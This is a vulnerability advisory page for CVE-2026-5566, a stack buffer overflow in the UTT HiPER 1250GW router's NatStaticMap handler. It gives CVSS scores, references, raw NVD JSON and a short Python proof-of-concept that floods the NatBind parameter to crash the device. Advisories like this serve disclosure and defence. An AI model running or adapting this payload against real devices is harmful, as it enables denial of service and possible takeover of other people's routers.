CVE-2026-5566

Description

A vulnerability was detected in UTT HiPER 1250GW up to 3.2.7-210907-180535. This affects the function strcpy of the file /goform/formNatStaticMap. Performing a manipulation of the argument NatBind results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UTT HiPER 1250GW <= 3.2.7-210907-180535

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_poc(target_ip):
    # Target URL for the vulnerable endpoint
    url = f"http://{target_ip}/goform/formNatStaticMap"
    
    # Construct payload to trigger buffer overflow
    # The 'NatBind' parameter is vulnerable due to unsafe strcpy
    # Sending a large string (e.g., 1000 'A's) to overwrite the stack
    payload = {
        "NatBind": "A" * 1000
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=payload, timeout=5)
        
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[!] Check if the device has crashed or if a shell is obtained.")
        else:
            print(f"[-] Unexpected response status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.1"
    exploit_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5566
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5566
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5566/
[4] VulDB https://vuldb.com/cve/CVE-2026-5566
[5] https://github.com/Moxxkidd/CVE/issues/1
[6] https://vuldb.com/submit/782993
[7] https://vuldb.com/vuln/355336
[8] https://vuldb.com/vuln/355336/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5566", "sourceIdentifier": "[email protected]", "published": "2026-04-05T13:17:14.520", "lastModified": "2026-04-24T18:14:34.620", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in UTT HiPER 1250GW up to 3.2.7-210907-180535. This affects the function strcpy of the file /goform/formNatStaticMap. Performing a manipulation of the argument NatBind results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/Moxxkidd/CVE/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/782993", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/355336", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/355336/cti", "source": "[email protected]"}]}}